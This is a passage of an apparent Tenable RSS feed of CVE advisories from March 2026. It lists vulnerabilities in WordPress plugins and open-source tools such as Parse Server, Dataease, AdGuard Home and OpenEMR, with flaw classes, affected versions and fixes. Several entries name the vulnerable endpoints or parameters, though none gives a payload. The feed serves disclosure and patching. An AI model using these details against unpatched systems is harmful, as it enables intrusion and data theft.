Missing Authorization vulnerability in raratheme Influencer influencer allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Influencer: from n/a through <= 1.1.7.

Read more at https://www.tenable.com/cve/CVE-2026-32370

]]> https://www.tenable.com/cve/CVE-2026-32369 https://www.tenable.com/cve/CVE-2026-32369 Fri, 13 Mar 2026 19:54:51 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in RadiusTheme Medilink-Core medilink-core allows PHP Local File Inclusion.This issue affects Medilink-Core: from n/a through < 2.0.7.

Read more at https://www.tenable.com/cve/CVE-2026-32369

]]> https://www.tenable.com/cve/CVE-2026-32368 https://www.tenable.com/cve/CVE-2026-32368 Fri, 13 Mar 2026 19:54:51 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in delphiknight Geo to Lat geo-to-lat allows Blind SQL Injection.This issue affects Geo to Lat: from n/a through <= 1.0.19.

Read more at https://www.tenable.com/cve/CVE-2026-32368

]]> https://www.tenable.com/cve/CVE-2026-32367 https://www.tenable.com/cve/CVE-2026-32367 Fri, 13 Mar 2026 19:54:50 GMT Critical Severity

Description

Improper Control of Generation of Code ('Code Injection') vulnerability in Yannick Lefebvre Modal Dialog modal-dialog allows Remote Code Inclusion.This issue affects Modal Dialog: from n/a through <= 3.5.16.

Read more at https://www.tenable.com/cve/CVE-2026-32367

]]> https://www.tenable.com/cve/CVE-2026-32366 https://www.tenable.com/cve/CVE-2026-32366 Fri, 13 Mar 2026 19:54:50 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in robfelty Collapsing Categories collapsing-categories allows Blind SQL Injection.This issue affects Collapsing Categories: from n/a through <= 3.0.9.

Read more at https://www.tenable.com/cve/CVE-2026-32366

]]> https://www.tenable.com/cve/CVE-2026-32365 https://www.tenable.com/cve/CVE-2026-32365 Fri, 13 Mar 2026 19:54:50 GMT Critical Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in robfelty Collapsing Archives collapsing-archives allows Blind SQL Injection.This issue affects Collapsing Archives: from n/a through <= 3.0.7.

Read more at https://www.tenable.com/cve/CVE-2026-32365

]]> https://www.tenable.com/cve/CVE-2026-32364 https://www.tenable.com/cve/CVE-2026-32364 Fri, 13 Mar 2026 19:54:50 GMT Critical Severity

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in redqteam Turbo Manager turbo-manager allows PHP Local File Inclusion.This issue affects Turbo Manager: from n/a through < 4.0.8.

Read more at https://www.tenable.com/cve/CVE-2026-32364

]]> https://www.tenable.com/cve/CVE-2026-32363 https://www.tenable.com/cve/CVE-2026-32363 Fri, 13 Mar 2026 19:54:50 GMT High Severity

Description

Missing Authorization vulnerability in Funlus Oy WPLifeCycle free-php-version-info allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WPLifeCycle: from n/a through <= 3.3.1.

Read more at https://www.tenable.com/cve/CVE-2026-32363

]]> https://www.tenable.com/cve/CVE-2026-32362 https://www.tenable.com/cve/CVE-2026-32362 Fri, 13 Mar 2026 19:54:50 GMT Medium Severity

Description

Missing Authorization vulnerability in activity-log.com WP Sessions Time Monitoring Full Automatic activitytime allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Sessions Time Monitoring Full Automatic: from n/a through <= 1.1.3.

Read more at https://www.tenable.com/cve/CVE-2026-32362

]]> https://www.tenable.com/cve/CVE-2026-32361 https://www.tenable.com/cve/CVE-2026-32361 Fri, 13 Mar 2026 19:54:49 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Marketing Fire Editorial Calendar editorial-calendar allows DOM-Based XSS.This issue affects Editorial Calendar: from n/a through <= 3.9.0.

Read more at https://www.tenable.com/cve/CVE-2026-32361

]]> https://www.tenable.com/cve/CVE-2026-32360 https://www.tenable.com/cve/CVE-2026-32360 Fri, 13 Mar 2026 19:54:49 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in richplugins Rich Showcase for Google Reviews widget-google-reviews allows Stored XSS.This issue affects Rich Showcase for Google Reviews: from n/a through <= 6.9.4.3.

Read more at https://www.tenable.com/cve/CVE-2026-32360

]]> https://www.tenable.com/cve/CVE-2026-3236 https://www.tenable.com/cve/CVE-2026-3236 Thu, 05 Mar 2026 11:15:54 GMT Low Severity

Description

In affected versions of Octopus Server it was possible to create a new API key from an existing access token resulting in the new API key having a lifetime exceeding the original API key used to mint the access token.

Read more at https://www.tenable.com/cve/CVE-2026-3236

]]> https://www.tenable.com/cve/CVE-2026-32359 https://www.tenable.com/cve/CVE-2026-32359 Fri, 13 Mar 2026 19:54:49 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins Icon List Block icon-list-block allows Stored XSS.This issue affects Icon List Block: from n/a through <= 1.2.3.

Read more at https://www.tenable.com/cve/CVE-2026-32359

]]> https://www.tenable.com/cve/CVE-2026-32358 https://www.tenable.com/cve/CVE-2026-32358 Fri, 13 Mar 2026 19:54:49 GMT High Severity

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wpdevelop Booking Calendar booking allows Blind SQL Injection.This issue affects Booking Calendar: from n/a through <= 10.14.15.

Read more at https://www.tenable.com/cve/CVE-2026-32358

]]> https://www.tenable.com/cve/CVE-2026-32357 https://www.tenable.com/cve/CVE-2026-32357 Fri, 13 Mar 2026 19:54:49 GMT Critical Severity

Description

Server-Side Request Forgery (SSRF) vulnerability in Katsushi Kawamori Simple Blog Card simple-blog-card allows Server Side Request Forgery.This issue affects Simple Blog Card: from n/a through <= 2.37.

Read more at https://www.tenable.com/cve/CVE-2026-32357

]]> https://www.tenable.com/cve/CVE-2026-32356 https://www.tenable.com/cve/CVE-2026-32356 Fri, 13 Mar 2026 19:54:47 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in robosoft Robo Gallery robo-gallery allows DOM-Based XSS.This issue affects Robo Gallery: from n/a through <= 5.1.2.

Read more at https://www.tenable.com/cve/CVE-2026-32356

]]> https://www.tenable.com/cve/CVE-2026-32355 https://www.tenable.com/cve/CVE-2026-32355 Fri, 13 Mar 2026 19:54:47 GMT Critical Severity

Description

Deserialization of Untrusted Data vulnerability in Crocoblock JetEngine jet-engine allows Object Injection.This issue affects JetEngine: from n/a through < 3.8.4.1.

Read more at https://www.tenable.com/cve/CVE-2026-32355

]]> https://www.tenable.com/cve/CVE-2026-32354 https://www.tenable.com/cve/CVE-2026-32354 Fri, 13 Mar 2026 19:54:47 GMT High Severity

Description

Insertion of Sensitive Information Into Sent Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Retrieve Embedded Sensitive Data.This issue affects WpEvently: from n/a through < 5.1.9.

Read more at https://www.tenable.com/cve/CVE-2026-32354

]]> https://www.tenable.com/cve/CVE-2026-32353 https://www.tenable.com/cve/CVE-2026-32353 Fri, 13 Mar 2026 19:54:47 GMT Critical Severity

Description

Server-Side Request Forgery (SSRF) vulnerability in MailerPress Team MailerPress mailerpress allows Server Side Request Forgery.This issue affects MailerPress: from n/a through <= 1.4.2.

Read more at https://www.tenable.com/cve/CVE-2026-32353

]]> https://www.tenable.com/cve/CVE-2026-32352 https://www.tenable.com/cve/CVE-2026-32352 Fri, 13 Mar 2026 19:54:47 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Elementor Website Builder elementor allows DOM-Based XSS.This issue affects Elementor Website Builder: from n/a through <= 3.35.5.

Read more at https://www.tenable.com/cve/CVE-2026-32352

]]> https://www.tenable.com/cve/CVE-2026-32351 https://www.tenable.com/cve/CVE-2026-32351 Fri, 13 Mar 2026 19:54:47 GMT Medium Severity

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows Stored XSS.This issue affects PowerPress Podcasting: from n/a through <= 11.15.13.

Read more at https://www.tenable.com/cve/CVE-2026-32351

]]> https://www.tenable.com/cve/CVE-2026-32350 https://www.tenable.com/cve/CVE-2026-32350 Fri, 13 Mar 2026 19:54:46 GMT Medium Severity

Description

Missing Authorization vulnerability in wpradiant Chocolate House chocolate-house allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chocolate House: from n/a through <= 1.1.5.

Read more at https://www.tenable.com/cve/CVE-2026-32350

]]> https://www.tenable.com/cve/CVE-2026-32349 https://www.tenable.com/cve/CVE-2026-32349 Fri, 13 Mar 2026 19:54:46 GMT Critical Severity

Description

Server-Side Request Forgery (SSRF) vulnerability in Andy Fragen Embed PDF Viewer embed-pdf-viewer allows Server Side Request Forgery.This issue affects Embed PDF Viewer: from n/a through <= 2.4.7.

Read more at https://www.tenable.com/cve/CVE-2026-32349

]]> https://www.tenable.com/cve/CVE-2026-32348 https://www.tenable.com/cve/CVE-2026-32348 Fri, 13 Mar 2026 19:54:46 GMT Medium Severity

Description

Missing Authorization vulnerability in MadrasThemes MAS Videos masvideos allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects MAS Videos: from n/a through <= 1.3.2.

Read more at https://www.tenable.com/cve/CVE-2026-32348

]]> https://www.tenable.com/cve/CVE-2026-32347 https://www.tenable.com/cve/CVE-2026-32347 Fri, 13 Mar 2026 19:54:46 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Restaurant and Cafe restaurant-and-cafe allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Restaurant and Cafe: from n/a through <= 1.2.5.

Read more at https://www.tenable.com/cve/CVE-2026-32347

]]> https://www.tenable.com/cve/CVE-2026-32346 https://www.tenable.com/cve/CVE-2026-32346 Fri, 13 Mar 2026 19:54:46 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Travel Agency travel-agency allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Travel Agency: from n/a through <= 1.5.5.

Read more at https://www.tenable.com/cve/CVE-2026-32346

]]> https://www.tenable.com/cve/CVE-2026-32345 https://www.tenable.com/cve/CVE-2026-32345 Fri, 13 Mar 2026 19:54:46 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Perfect Portfolio perfect-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Perfect Portfolio: from n/a through <= 1.2.4.

Read more at https://www.tenable.com/cve/CVE-2026-32345

]]> https://www.tenable.com/cve/CVE-2026-32344 https://www.tenable.com/cve/CVE-2026-32344 Fri, 13 Mar 2026 19:54:45 GMT High Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in desertthemes Corpiva corpiva allows Cross Site Request Forgery.This issue affects Corpiva: from n/a through <= 1.0.96.

Read more at https://www.tenable.com/cve/CVE-2026-32344

]]> https://www.tenable.com/cve/CVE-2026-32343 https://www.tenable.com/cve/CVE-2026-32343 Fri, 13 Mar 2026 19:54:45 GMT High Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in Magazine3 Easy Table of Contents easy-table-of-contents allows Cross Site Request Forgery.This issue affects Easy Table of Contents: from n/a through <= 2.0.80.

Read more at https://www.tenable.com/cve/CVE-2026-32343

]]> https://www.tenable.com/cve/CVE-2026-32342 https://www.tenable.com/cve/CVE-2026-32342 Fri, 13 Mar 2026 19:54:45 GMT High Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery.This issue affects Quiz Maker: from n/a through <= 6.7.1.2.

Read more at https://www.tenable.com/cve/CVE-2026-32342

]]> https://www.tenable.com/cve/CVE-2026-32341 https://www.tenable.com/cve/CVE-2026-32341 Fri, 13 Mar 2026 19:54:45 GMT High Severity

Description

Missing Authorization vulnerability in raratheme Benevolent benevolent allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Benevolent: from n/a through <= 1.3.9.

Read more at https://www.tenable.com/cve/CVE-2026-32341

]]> https://www.tenable.com/cve/CVE-2026-32340 https://www.tenable.com/cve/CVE-2026-32340 Fri, 13 Mar 2026 19:54:45 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Business One Page business-one-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business One Page: from n/a through <= 1.3.2.

Read more at https://www.tenable.com/cve/CVE-2026-32340

]]> https://www.tenable.com/cve/CVE-2026-32339 https://www.tenable.com/cve/CVE-2026-32339 Fri, 13 Mar 2026 19:54:44 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Bakes And Cakes bakes-and-cakes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Bakes And Cakes: from n/a through <= 1.2.9.

Read more at https://www.tenable.com/cve/CVE-2026-32339

]]> https://www.tenable.com/cve/CVE-2026-32338 https://www.tenable.com/cve/CVE-2026-32338 Fri, 13 Mar 2026 19:54:44 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Construction Landing Page construction-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Construction Landing Page: from n/a through <= 1.4.1.

Read more at https://www.tenable.com/cve/CVE-2026-32338

]]> https://www.tenable.com/cve/CVE-2026-32337 https://www.tenable.com/cve/CVE-2026-32337 Fri, 13 Mar 2026 19:54:44 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Preschool and Kindergarten preschool-and-kindergarten allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Preschool and Kindergarten: from n/a through <= 1.2.5.

Read more at https://www.tenable.com/cve/CVE-2026-32337

]]> https://www.tenable.com/cve/CVE-2026-32336 https://www.tenable.com/cve/CVE-2026-32336 Fri, 13 Mar 2026 19:54:44 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme Rara Business rara-business allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Rara Business: from n/a through <= 1.3.0.

Read more at https://www.tenable.com/cve/CVE-2026-32336

]]> https://www.tenable.com/cve/CVE-2026-32335 https://www.tenable.com/cve/CVE-2026-32335 Fri, 13 Mar 2026 19:54:44 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme The Conference the-conference allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects The Conference: from n/a through <= 1.2.5.

Read more at https://www.tenable.com/cve/CVE-2026-32335

]]> https://www.tenable.com/cve/CVE-2026-32334 https://www.tenable.com/cve/CVE-2026-32334 Fri, 13 Mar 2026 19:54:43 GMT Medium Severity

Description

Missing Authorization vulnerability in raratheme JobScout jobscout allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects JobScout: from n/a through <= 1.1.7.

Read more at https://www.tenable.com/cve/CVE-2026-32334

]]> https://www.tenable.com/cve/CVE-2026-32332 https://www.tenable.com/cve/CVE-2026-32332 Fri, 13 Mar 2026 19:54:43 GMT High Severity

Description

Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Easy Form: from n/a through <= 2.7.9.

Read more at https://www.tenable.com/cve/CVE-2026-32332

]]> https://www.tenable.com/cve/CVE-2026-32331 https://www.tenable.com/cve/CVE-2026-32331 Fri, 13 Mar 2026 19:54:43 GMT Medium Severity

Description

Missing Authorization vulnerability in Israpil Textmetrics webtexttool allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Textmetrics: from n/a through <= 3.6.4.

Read more at https://www.tenable.com/cve/CVE-2026-32331

]]> https://www.tenable.com/cve/CVE-2026-32330 https://www.tenable.com/cve/CVE-2026-32330 Fri, 13 Mar 2026 19:54:43 GMT High Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Cross Site Request Forgery.This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37.

Read more at https://www.tenable.com/cve/CVE-2026-32330

]]> https://www.tenable.com/cve/CVE-2026-32329 https://www.tenable.com/cve/CVE-2026-32329 Fri, 13 Mar 2026 19:54:43 GMT Medium Severity

Description

Missing Authorization vulnerability in Ays Pro Advanced Related Posts advanced-related-posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Related Posts: from n/a through <= 1.9.1.

Read more at https://www.tenable.com/cve/CVE-2026-32329

]]> https://www.tenable.com/cve/CVE-2026-32328 https://www.tenable.com/cve/CVE-2026-32328 Fri, 13 Mar 2026 19:54:42 GMT Medium Severity

Description

Cross-Site Request Forgery (CSRF) vulnerability in shufflehound Lemmony lemmony allows Cross Site Request Forgery.This issue affects Lemmony: from n/a through < 1.7.1.

Read more at https://www.tenable.com/cve/CVE-2026-32328

]]> https://www.tenable.com/cve/CVE-2026-32322 https://www.tenable.com/cve/CVE-2026-32322 Fri, 13 Mar 2026 19:54:42 GMT Medium Severity

Description

soroban-sdk is a Rust SDK for Soroban contracts. Prior to 22.0.11, 23.5.3, and 25.3.0, The Fr (scalar field) types for BN254 and BLS12-381 in soroban-sdk compared values using their raw U256 representation without first reducing modulo the field modulus r. This caused mathematically equal field elements to compare as not-equal when one or both values were unreduced (i.e., >= r). The vulnerability requires an attacker to supply crafted Fr values through contract inputs, and compare them directly without going through host-side arithmetic operations. Smart contracts that rely on Fr equality checks for security-critical logic could produce incorrect results. The impact depends on how the affected contract uses Fr equality comparisons, but can result in incorrect authorization decisions or validation bypasses in contracts that perform equality checks on user-supplied scalar values. This vulnerability is fixed in 22.0.11, 23.5.3, and 25.3.0.

Read more at https://www.tenable.com/cve/CVE-2026-32322

]]> https://www.tenable.com/cve/CVE-2026-32320 https://www.tenable.com/cve/CVE-2026-32320 Fri, 13 Mar 2026 19:54:42 GMT Medium Severity

Description

Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a PathSwitchRequest containing UE Security Capabilities with zero-length NR encryption or integrity protection algorithm bitstrings, resulting in a denial of service. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1.

Read more at https://www.tenable.com/cve/CVE-2026-32320

]]> https://www.tenable.com/cve/CVE-2026-32319 https://www.tenable.com/cve/CVE-2026-32319 Fri, 13 Mar 2026 19:54:42 GMT High Severity

Description

Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a malformed integrity protected NGAP/NAS message with a length under 7 bytes. An attacker able to send crafted NAS messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1.

Read more at https://www.tenable.com/cve/CVE-2026-32319

]]> https://www.tenable.com/cve/CVE-2026-32308 https://www.tenable.com/cve/CVE-2026-32308 Fri, 13 Mar 2026 19:54:42 GMT High Severity

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.

Read more at https://www.tenable.com/cve/CVE-2026-32308

]]> https://www.tenable.com/cve/CVE-2026-32306 https://www.tenable.com/cve/CVE-2026-32306 Fri, 13 Mar 2026 19:54:42 GMT Critical Severity

Description

OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the telemetry aggregation API accepts user-controlled aggregationType, aggregateColumnName, and aggregationTimestampColumnName parameters and interpolates them directly into ClickHouse SQL queries via the .append() method (documented as "trusted SQL"). There is no allowlist, no parameterized query binding, and no input validation. An authenticated user can inject arbitrary SQL into ClickHouse, enabling full database read (including telemetry data from all tenants), data modification, and potential remote code execution via ClickHouse table functions. This vulnerability is fixed in 10.0.23.

Read more at https://www.tenable.com/cve/CVE-2026-32306

]]> https://www.tenable.com/cve/CVE-2026-32304 https://www.tenable.com/cve/CVE-2026-32304 Fri, 13 Mar 2026 19:54:41 GMT Critical Severity

Description

Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Prior to 3.0.14, the create_function(args, code) function passes both parameters directly to the Function constructor without any sanitization, allowing arbitrary code execution. This is distinct from CVE-2026-29091 which was call_user_func_array using eval() in v2.x. This finding affects create_function using new Function() in v3.x. This vulnerability is fixed in 3.0.14.

Read more at https://www.tenable.com/cve/CVE-2026-32304

]]> https://www.tenable.com/cve/CVE-2026-32302 https://www.tenable.com/cve/CVE-2026-32302 Fri, 13 Mar 2026 19:54:41 GMT High Severity

Description

OpenClaw is a personal AI assistant. Prior to 2026.3.11, browser-originated WebSocket connections could bypass origin validation when gateway.auth.mode was set to trusted-proxy and the request arrived with proxy headers. A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session. This vulnerability is fixed in 2026.3.11.

Read more at https://www.tenable.com/cve/CVE-2026-32302

]]> https://www.tenable.com/cve/CVE-2026-32301 https://www.tenable.com/cve/CVE-2026-32301 Fri, 13 Mar 2026 19:54:41 GMT Critical Severity

Description

Centrifugo is an open-source scalable real-time messaging server. Prior to 6.7.0, Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination. This vulnerability is fixed in 6.7.0.

Read more at https://www.tenable.com/cve/CVE-2026-32301

]]> https://www.tenable.com/cve/CVE-2026-32269 https://www.tenable.com/cve/CVE-2026-32269 Thu, 12 Mar 2026 20:16:06 GMT Medium Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.13 and 8.6.39, the OAuth2 authentication adapter does not correctly validate app IDs when appidField and appIds are configured. During app ID validation, a malformed value is sent to the token introspection endpoint instead of the user's actual access token. Depending on the introspection endpoint's behavior, this could either cause all OAuth2 logins to fail, or allow authentication from disallowed app contexts if the endpoint returns valid-looking data for the malformed request. Deployments using the OAuth2 adapter with appidField and appIds configured are affected. This vulnerability is fixed in 9.6.0-alpha.13 and 8.6.39.

Read more at https://www.tenable.com/cve/CVE-2026-32269

]]> https://www.tenable.com/cve/CVE-2026-32251 https://www.tenable.com/cve/CVE-2026-32251 Thu, 12 Mar 2026 20:16:05 GMT Critical Severity

Description

Tolgee is an open-source localization platform. Prior to 3.166.3, the XML parsers used for importing Android XML resources (.xml) and .resx files don't disable external entity processing. An authenticated user who can import translation files into a project can exploit this to read arbitrary files from the server and make server-side requests to internal services. This vulnerability is fixed in 3.166.3.

Read more at https://www.tenable.com/cve/CVE-2026-32251

]]> https://www.tenable.com/cve/CVE-2026-32248 https://www.tenable.com/cve/CVE-2026-32248 Thu, 12 Mar 2026 20:16:05 GMT Critical Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.12 and 8.6.38, an unauthenticated attacker can take over any user account that was created with an authentication provider that does not validate the format of the user identifier (e.g. anonymous authentication). By sending a crafted login request, the attacker can cause the server to perform a pattern-matching query instead of an exact-match lookup, allowing the attacker to match an existing user and obtain a valid session token for that user's account. Both MongoDB and PostgreSQL database backends are affected. Any Parse Server deployment that allows anonymous authentication (enabled by default) is vulnerable. This vulnerability is fixed in 9.6.0-alpha.12 and 8.6.38.

Read more at https://www.tenable.com/cve/CVE-2026-32248

]]> https://www.tenable.com/cve/CVE-2026-32242 https://www.tenable.com/cve/CVE-2026-32242 Thu, 12 Mar 2026 19:16:19 GMT Critical Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.11 and 8.6.37, Parse Server's built-in OAuth2 auth adapter exports a singleton instance that is reused directly across all OAuth2 provider configurations. Under concurrent authentication requests for different OAuth2 providers, one provider's token validation may execute using another provider's configuration, potentially allowing a token that should be rejected by one provider to be accepted because it is validated against a different provider's policy. Deployments that configure multiple OAuth2 providers via the oauth2: true flag are affected. This vulnerability is fixed in 9.6.0-alpha.11 and 8.6.37.

Read more at https://www.tenable.com/cve/CVE-2026-32242

]]> https://www.tenable.com/cve/CVE-2026-32234 https://www.tenable.com/cve/CVE-2026-32234 Wed, 11 Mar 2026 20:16:18 GMT Medium Severity

Description

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.10 and 8.6.36, an attacker with access to the master key can inject malicious SQL via crafted field names used in query constraints when Parse Server is configured with PostgreSQL as the database. The field name in a $regex query operator is passed to PostgreSQL using unparameterized string interpolation, allowing the attacker to manipulate the SQL query. While the master key controls what can be done through the Parse Server abstraction layer, this SQL injection bypasses Parse Server entirely and operates at the database level. This vulnerability only affects Parse Server deployments using PostgreSQL. This vulnerability is fixed in 9.6.0-alpha.10 and 8.6.36.

Read more at https://www.tenable.com/cve/CVE-2026-32234

]]> https://www.tenable.com/cve/CVE-2026-32230 https://www.tenable.com/cve/CVE-2026-32230 Thu, 12 Mar 2026 19:16:16 GMT Medium Severity

Description

Uptime Kuma is an open source, self-hosted monitoring tool. From 2.0.0 to 2.1.3 , the GET /api/badge/:id/ping/:duration? endpoint in server/routers/api-router.js does not verify that the requested monitor belongs to a public group. All other badge endpoints check AND public = 1 in their SQL query before returning data. The ping endpoint skips this check entirely, allowing unauthenticated users to extract average ping/response time data for private monitors. This vulnerability is fixed in 2.2.0.

Read more at https://www.tenable.com/cve/CVE-2026-32230

]]> https://www.tenable.com/cve/CVE-2026-32141 https://www.tenable.com/cve/CVE-2026-32141 Thu, 12 Mar 2026 18:16:25 GMT High Severity

Description

flatted is a circular JSON parser. Prior to 3.4.0, flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0.

Read more at https://www.tenable.com/cve/CVE-2026-32141

]]> https://www.tenable.com/cve/CVE-2026-32140 https://www.tenable.com/cve/CVE-2026-32140 Thu, 12 Mar 2026 18:16:25 GMT Critical Severity

Description

Dataease is an open source data visualization analysis tool. Prior to 2.10.20, By controlling the IniFile parameter, an attacker can force the JDBC driver to load an attacker-controlled configuration file. This configuration file can inject dangerous JDBC properties, leading to remote code execution. The Redshift JDBC driver execution flow reaches a method named getJdbcIniFile. The getJdbcIniFile method implements an aggressive automatic configuration file discovery mechanism. If not explicitly restricted, it searches for a file named rsjdbc.ini. In a JDBC URL context, users can explicitly specify the configuration file via URL parameters, which allows arbitrary files on the server to be loaded as JDBC configuration files. Within the Redshift JDBC driver properties, the parameter IniFile is explicitly supported and used to load an external configuration file. This vulnerability is fixed in 2.10.20.

Read more at https://www.tenable.com/cve/CVE-2026-32140

]]> https://www.tenable.com/cve/CVE-2026-32139 https://www.tenable.com/cve/CVE-2026-32139 Thu, 12 Mar 2026 18:16:25 GMT Medium Severity

Description

Dataease is an open source data visualization analysis tool. In DataEase 2.10.19 and earlier, the static resource upload interface allows SVG uploads. However, backend validation only checks whether the XML is parseable and whether the root node is svg. It does not sanitize active content such as onload/onerror event handlers or script-capable attributes. As a result, an attacker can upload a malicious SVG and then trigger script execution in a browser by visiting the exposed static resource URL, forming a full stored XSS exploitation chain. This vulnerability is fixed in 2.10.20.

Read more at https://www.tenable.com/cve/CVE-2026-32139

]]> https://www.tenable.com/cve/CVE-2026-32137 https://www.tenable.com/cve/CVE-2026-32137 Thu, 12 Mar 2026 18:16:25 GMT Critical Severity

Description

Dataease is an open source data visualization analysis tool. Prior to 2.10.20, The table parameter for /de2api/datasource/previewData is directly concatenated into the SQL statement without any filtering or parameterization. Since tableName is a user-controllable string, attackers can inject malicious SQL statements by constructing malicious table names. This vulnerability is fixed in 2.10.20.

Read more at https://www.tenable.com/cve/CVE-2026-32137

]]> https://www.tenable.com/cve/CVE-2026-32136 https://www.tenable.com/cve/CVE-2026-32136 Wed, 11 Mar 2026 22:16:33 GMT Critical Severity

Description

AdGuard Home is a network-wide software for blocking ads and tracking. Prior to 0.107.73, an unauthenticated remote attacker can bypass all authentication in AdGuardHome by sending an HTTP/1.1 request that requests an upgrade to HTTP/2 cleartext (h2c). Once the upgrade is accepted, the resulting HTTP/2 connection is handled by the inner mux, which has no authentication middleware attached. All subsequent HTTP/2 requests on that connection are processed as fully authenticated, regardless of whether any credentials were provided. This vulnerability is fixed in 0.107.73.

Read more at https://www.tenable.com/cve/CVE-2026-32136

]]> https://www.tenable.com/cve/CVE-2026-32133 https://www.tenable.com/cve/CVE-2026-32133 Wed, 11 Mar 2026 22:16:33 GMT High Severity

Description

2FAuth is a web app to manage Two-Factor Authentication (2FA) accounts and generate their security codes. Prior to 6.1.0, a blind SSRF vulnerability exists in 2FAuth that allows authenticated users to make arbitrary HTTP requests from the server to internal networks and cloud metadata endpoints. The image parameter in OTP URL is not properly validated for internal / private IP addresses before making HTTP requests. While the previous fix added response validation to ensure only valid images are stored but HTTP request is still made to arbitrary URLs before this validation occurs. This vulnerability is fixed in 6.1.0.

Read more at https://www.tenable.com/cve/CVE-2026-32133

]]> https://www.tenable.com/cve/CVE-2026-32127 https://www.tenable.com/cve/CVE-2026-32127 Wed, 11 Mar 2026 21:16:18 GMT High Severity

Description

OpenEMR is a free and open source electronic health records and medical practice management application. Prior to 8.0.0.1, OpenEMR contains a SQL injection vulnerability in the ajax graphs library that can be exploited by authenticated attackers. The vulnerability exists due to insufficient input validation in the ajax graphs library. This vulnerability is fixed in 8.0.0.1.

Read more at https://www.tenable.com/cve/CVE-2026-32127

]]> https://www.tenable.com/cve/CVE-2026-32126 https://www.tenable.com/cve/CVE-2026-32126 Wed, 11 Mar 2026 21:16:18 GMT High Severity

Description

